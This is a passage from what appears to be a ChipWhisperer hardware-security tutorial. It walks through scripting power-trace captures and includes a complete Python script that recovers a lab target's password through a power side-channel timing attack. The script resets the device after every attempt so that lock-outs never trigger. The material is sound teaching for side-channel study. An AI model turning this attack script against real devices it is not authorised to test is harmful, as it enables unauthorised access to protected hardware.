Reset via Spare IO Lines

TODO - see reset via programming interface for now

Reset via Auxiliary Module

Auxiliary modules are small pieces of code that can perform some extra functions during the capture process. The functions inside these Python modules are run before a capture, before the power measurement is armed, before the measurement is triggered, after a single trace is completed, and after an entire capture is finished. We will use an existing auxiliary module to reset the target chip before arming the measurement so that we don't have to manually reset the device.

1. We're going to use the Reset AVR/XMEGA via CW-Lite auxiliary module. Let's get an idea of how this module works:
   • Navigate to the auxiliary modules folder (chipwhisperer\software\chipwhisperer\capture\auxiliary\) and open ResetCW1183Read.py in your choice of text editor.
   • Find the function definition for resetDevice(). It contains a line that looks like:

   CWCoreAPI.getInstance().getScope().scopetype.cwliteXMEGA.readSignature()
   

   • Look for the lines where this function gets called. You'll find that the function traceArm() uses it like:

   resettiming = self.findParam('resettiming').value()
   if resettiming == 'Pre-Arm':
       self.resetDevice()
   

   Effectively, this code will read the target's signature before we arm the power measurement. This means that the target will automatically be reset before capturing a power trace.

2. Go back to the ChipWhisperer Capture software. In the Generic Settings tab, switch the Auxiliary Module to Reset AVR/XMEGA via CW-Lite.
3. Now, in the Aux Settings tab, we can configure our automatic reset. Make sure the settings are:
   • Pre-arm delay: roughly 1200 ms
   • Post-arm delay: the default (0 ms) is fine
   • Reset timing: Pre-arm (reset the device before we arm the scope)
4. Press Capture 1. The target will automatically reset, with the Safe-o-matic 3000 boot sequence appearing in the console. Then, 1 second later, the program will send the password to the target and record a power trace.

Now, confirm that you can try different passwords (in Target Settings) and see how the power trace changes when your password has 0, 1, 2... correct characters.

Scripting Communications

1. Make a copy of the existing script. You can find it at chipwhisperer\software\chipwhisperer\capture\scripts, for example the default one is called cwlite-simpleserialxmega.py for the XMEGA device. Copy this to another directory that you will use for the attack.

2. Rename the script something else - for example cwlite-passwordcrack.py, and open it for editing. You'll notice the following is a main chunk of the code, where the parameters are set:

   #Example of using a list to set parameters. Slightly easier to copy/paste in this format
   lstexample = [['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
                 ['CW Extra', 'CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'],
                 ['CW Extra', 'CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'],
                 ['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0],
                 ['CW Extra', 'CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'],
                 ['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'],
                 ['OpenADC', 'Trigger Setup', 'Total Samples', 3000],
                 ['OpenADC', 'Trigger Setup', 'Offset', 1500],
                 ['OpenADC', 'Gain Setting', 'Setting', 45],
                 ['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'],
                 #Final step: make DCMs relock in case they are lost
                 ['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],
                 ]

   Those parameters come from the Scripting Parameters tab. Switch over to it and notice how when you change the text for example, it tells you the required parameter name to do this via the API call:

   

   Note that commands run via the script are also printed, so you can see where the values being set are coming from too. At this point close the ChipWhisperer-Capture window, as we will confirm the script still works.

3. Run the new script (which doesn't have any changes yet). You may have to open a console with Python in the path:

   1. If you installed WinPython, run the WinPython Console from your WinPython installation directory.
   2. If using the VMWare image of a Linux machine, this should just be a regular console

Run the script with python cwlite-passwordcrack.py. If the script errors out, it might be that the location of the FPGA bitstream is stored in relative terms. To fix this perform the following:

1. Open ChipWhisperer-Capture regularly.
2. Run the ChipWhisperer script that you used previously.
3. Select Tools-->Config CW Firmware
4. Under the "FPGA .zip (Release)", hit the "Find" button. Point the system to the file chipwhisperer/hardware/capture/chipwhisperer-lite/cwlite_firmware.zip on your filesystem. Note by default there is a relative path.

4. Once again on the Target Settings tab, delete the various commands. Note the resulting Script Commands which you will need to enter to achieve this same goal.
5. Close ChipWhisperer-Capture.

6. Edit the script, first find the line setting the Trigger Offset:

   ['OpenADC', 'Trigger Setup', 'Offset', 1500],

   And set this to 0, which we were using previously:

   ['OpenADC', 'Trigger Setup', 'Offset', 0],

7. Next, append the required commands to clear the simpleserial commands:

   #Example of using a list to set parameters. Slightly easier to copy/paste in this format
   lstexample = [['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
                 ...BUNCH MORE COMMANDS HERE HAVE BEEN REMOVED...
                 #Final step: make DCMs relock in case they are lost
                 ['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],
   
                 #Append your commands here
                 ['Target Connection', 'Load Key Command', u''],
                 ['Target Connection', 'Go Command', u''],
                 ['Target Connection', 'Output Format', u''],                      
                 ]

8. Next, we are going to "hack in" the Auxiliary module. While the following isn't great Python code, the idea is to demonstrate how we can rapidly iterate with the combination of GUI to explore options, and the script to write them into place. First, add the imports to the start of the Python script:

   from time import sleep
   from chipwhisperer.capture.auxiliary.AuxiliaryTemplate import AuxiliaryTemplate

   Find the section of the file that sends the previous commands to the hardware. You will see a line like the following:

   #Download all hardware setup parameters
   for cmd in lstexample: cap.setParameter(cmd)

   We will then hack in the script we tested previously, which will insert our custom Auxiliary module:

   #Download all hardware setup parameters
   for cmd in lstexample: cap.setParameter(cmd)
   
   def reset_device():
       cap.scope.scopetype.cwliteXMEGA.readSignature()
       sleep(0.8)
   
   class resetClass(AuxiliaryTemplate):
     def traceDone(self):
      reset_device()
   
   rc = resetClass()
   cap.auxChanged(rc)

   Note we changed the references to "self" to "cap", as we are no longer running from within the Capture environment. Otherwise we have used the ability of Python to declare classes inside of functions to avoid needing to think about how to properly declare everything.

9. Finally, we will set the password. You can enter the password in the Capture Target Settings tab, and see the following sort of call would set the appropriate password:

   cap.setParameter(['Target Connection', 'Go Command', u'h0px3\\n'])

   Note the newline is actually escaped, to set the text equivalent of what will be printed. This will result in an actual newline going out across the serial port.

   Set that command at some point after your call to cap.auxChanged(). Close any open ChipWhisperer-Capture windows, and run the script as before. You should connect to the target, and be able to press Capture 1 and see the correct waveform.

10. Next, we will automatically start attacking the system. You needed to figure out where we will look to determine if the password check is working. Looking at an example of the power when 0 and 1 bytes are correct, we can see a good point that appears to shift forward in time:

    

    This point corresponds to an offset of 153 samples, and a delta for each character of 72 points. Note the specific point will change for different hardware, and may also change if you use different versions of avr-gcc to compile the target code. The example code here was compiled with WinAVR 20100110, which has avr-gcc 4.3.3. If you view the video version of this tutorial the point numbers are different for example, so be sure to check what they are for your specific system.

    Let's start with cracking just the first character, assuming it's a lowercase alphanumeric character:

    trylist = "abcdefghijklmnopqrstuvwyx0123456789"
    
    for c in trylist:
        cap.setParameter(['Target Connection', 'Go Command', u'%c\\n'%c])
        cap.capture1()
    
        #TODO: Check data to see if successful??
        print "Try = %c"%c
    
        #Call to pe() causes GUI to process outstanding events, useful if you are calling API directly
        pe()

11. We haven't yet pragmatically tested the results, but run the script anyway (to kill it, you'll have to use Ctrl-C on the terminal window). You should notice a distinct change of the power signature when it runs through "Try = h".

12. We can access cap.scope.datapoints to get the data points. Let's print that point of interest (again change the point for your specific setup):

    for c in trylist:
        cap.setParameter(['Target Connection', 'Go Command', u'%c\\n'%c])
        cap.capture1()
    
        #TODO: Check data to see if successful??
        print "Try = %c"%c
        print cap.scope.datapoints[153]
    
        #Call to pe() causes GUI to process outstanding events, useful if you are calling API directly
        pe()

13. Running that example, you can see we can use a simple threshold to detect the correct password. Finally use the following paying careful attention that you first:

    • Check the offset and delta values (here they are 153 and 72)
    • Note that the "Go Command" has been modified to send the known password characters, otherwise it won't work in a progressive manner.

    The following is a sample code you can replace the previous with:

    password = ""
    
    for i in range(0,5):
        print "***CHARACTER %d***"%i
        for c in trylist:
            cap.setParameter(['Target Connection', 'Go Command', password + "%c\\n"%c])
            cap.capture1()
    
            print "Try = %c"%c
            #print cap.scope.datapoints[153 + i*72]
            if cap.scope.datapoints[153 + i*72] > -0.2:
                print "****CHARACTER %d = %c****"%(i, c)
                password += c
                break
    
            elif c == "9":
                print "****CHARACTER %d FAILED****"%(i)
                password += "?"
    
            #Call to pe() causes GUI to process outstanding events, useful if you are calling API directly
            pe()    
    
    print password

That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:

* The target device has a finite start-up time, which slows down the attack. If you wish, remove some of the printf()'s from the target code, recompile and reprogram, and see how quickly you can do this attack.

• The current script doesn't look for the "WELCOME" message when the password is OK. That is an extension that allows it to crack any size password.
• If there was a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.

Conclusion

This tutorial has demonstrated the use of the power side-channel for performing timing attacks. A target with a simple password-based security system is broken. In addition you have learned about the scripting support in the ChipWhisperer-Capture software.